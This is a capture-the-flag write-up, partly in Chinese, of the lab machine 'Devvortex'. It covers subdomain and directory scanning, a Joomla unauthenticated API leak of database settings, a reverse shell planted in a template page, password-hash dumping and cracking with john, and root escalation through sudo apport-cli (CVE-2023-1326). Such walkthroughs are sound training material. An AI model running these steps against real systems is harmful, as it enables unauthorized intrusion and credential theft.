Devvortex
Machine:Linux
Level:Easy
Nmap
└─# nmap -sCV 10.10.11.242
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 00:57 GMT
Nmap scan report for 10.10.11.242
Host is up (0.23s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.33 seconds
ffuf
└─# ffuf -w /home/kali/Pentest_dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://devvortex.htb/" -H 'Host: FUZZ.devvortex.htb'
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://devvortex.htb/
:: Wordlist : FUZZ: /home/kali/Pentest_dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.devvortex.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
......
dev [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 344ms]
......
:: Progress: [4989/4989] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:39] :: Errors: 0 ::
User Access
Unauthorized Access → Account&Password
先访问devvortex.htb,网页中并没有可利用点。访问子域名并扫描,发现/administrator/。
└─# dirsearch -u http://dev.devvortex.htb/ -w ~/directory-list-2.3-medium.txt -i 200,301
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 220545
Output File: /root/.dirsearch/reports/dev.devvortex.htb/-_23-11-26_06-17-12.txt
Error Log: /root/.dirsearch/logs/errors-23-11-26_06-17-12.log
Target: http://dev.devvortex.htb/
[06:17:17] Starting:
[06:17:36] 301 - 178B - /images -> http://dev.devvortex.htb/images/
[06:17:39] 200 - 23KB - /home
[06:17:42] 301 - 178B - /media -> http://dev.devvortex.htb/media/
[06:17:42] 301 - 178B - /templates -> http://dev.devvortex.htb/templates/
[06:17:47] 301 - 178B - /modules -> http://dev.devvortex.htb/modules/
[06:18:22] 301 - 178B - /plugins -> http://dev.devvortex.htb/plugins/
[06:18:33] 301 - 178B - /includes -> http://dev.devvortex.htb/includes/
[06:18:49] 301 - 178B - /language -> http://dev.devvortex.htb/language/
[06:18:52] 301 - 178B - /components -> http://dev.devvortex.htb/components/
[06:18:53] 301 - 178B - /api -> http://dev.devvortex.htb/api/
[06:18:55] 301 - 178B - /cache -> http://dev.devvortex.htb/cache/
[06:19:00] 301 - 178B - /libraries -> http://dev.devvortex.htb/libraries/
[06:20:02] 301 - 178B - /tmp -> http://dev.devvortex.htb/tmp/
[06:20:13] 301 - 178B - /layouts -> http://dev.devvortex.htb/layouts/
[06:21:39] 301 - 178B - /administrator -> http://dev.devvortex.htb/administrator/
[06:35:28] 301 - 178B - /cli -> http://dev.devvortex.htb/cli/
[06:50:26] 200 - 92B - /appeal
[06:50:27] 200 - 92B - /32801
[06:50:28] 200 - 92B - /purchases
[06:50:28] 200 - 92B - /sbb
访问网页发现是Joomla,查询发现该内容管理系统存在未授权访问漏洞并且复现成功。
{
......
"data": [
......
{
"type": "application",
"id": "224",
"attributes": {
"offline_message": "This site is down for maintenance.<br>Please check back again soon.",
"id": 224
}
},
......
{
"type": "application",
"id": "224",
"attributes": {
"sitename": "Development",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"editor": "tinymce",
"id": 224
}
},
......
{
"type": "application",
"id": "224",
"attributes": {
"dbtype": "mysqli",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"host": "[deleted]",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"user": "[deleted]",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"password": "[deleted]",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"db": "[deleted]",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"dbprefix": "sd4fg_",
"id": 224
}
},
......
}
Templates: Customise → reverse shell
使用账密成功进入后台管理系统,对系统中的功能进行浏览发现Templates: Customise (Cassiopeia)中有多个.php页面可以自定义,随便选择一个将我们的反向shell放进去并访问。
└─# nc -lnvp 1234
listening on [any] 1234 ...
Linux devvortex 5.4.0-167-generic #184-Ubuntu SMP Tue Oct 31 09:21:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
07:13:18 up 2 min, 0 users, load average: 0.52, 0.34, 0.13
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("bash")'
www-data@devvortex:/$ export TERM=xterm-256color
www-data@devvortex:/$ whoami
www-data
www-data@devvortex:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
MySQL → logan
拿到webshell后需要提权为用户,对特权等搜索后并没有发现什么提权点。在最开始的未授权访问中发现该系统使用mysql顺便摸索一下。
www-data@devvortex:/$ mysql --host=localhost --user=[deleted] --password=[deleted] [deleted] -e "show tables"
mysql: [Warning] Using a password on the command line interface can be insecure.
+-------------------------------+
| Tables_in_joomla |
+-------------------------------+
......
| sd4fg_users |
......
+-------------------------------+
www-data@devvortex:/$ mysql --host=localhost --user=[deleted] --password=[deleted] [deleted] -e "select * from sd4fg_users"
mysql: [Warning] Using a password on the command line interface can be insecure.
.....
| 650 | logan paul | logan | logan@devvortex.htb | [deleted] | 0 | 0 | 2023-09-26 19:15:42 | NULL | |
......
数据库中拿到了logan用户的密码hash值,hashcat没查到对应的类型就直接使用john爆破。
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[deleted] (logan)
Root Access
在特权指令中发现可以使用apport-cli,该应用存在CVE-2023-1326即使用默认寻呼机查看 apport-cli 崩溃可能会提升权限。
logan@devvortex:~$ sudo -l
[sudo] password for logan:
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli
刚好可以使用MySQL来配合使CVE成功。
logan@devvortex:~$ sudo apport-cli -c /bin/mysql less
*** Collecting problem information
The collected information can be sent to the developers to improve the
application. This might take a few minutes.
..................
*** Send problem report to the developers?
After the problem report has been sent, please fill out the form in the
automatically opened web browser.
What would you like to do? Your options are:
S: Send report (1.6 KB)
V: View report
K: Keep report file for sending later or copying to somewhere else
I: Cancel and ignore future crashes of this program version
C: Cancel
Please choose (S/V/K/I/C): v #v后输入!sh
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root